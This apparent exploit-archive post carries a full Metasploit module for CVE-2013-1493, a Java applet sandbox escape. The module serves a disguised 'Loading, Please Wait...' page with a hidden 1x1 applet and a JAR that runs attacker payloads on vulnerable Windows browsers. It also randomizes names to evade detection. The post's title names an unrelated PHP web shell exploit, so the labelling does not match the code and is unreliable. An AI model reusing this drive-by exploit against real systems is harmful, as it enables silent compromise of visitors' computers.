STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework under
  # data/exploits/cve-2013-1493 and randomize the name of the entry class.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Serve the JAR for *.jar requests, the applet page for the resource root,
  # and redirect everything else to the root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Build the minimal HTML page that embeds the applet.
  def generate_html
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end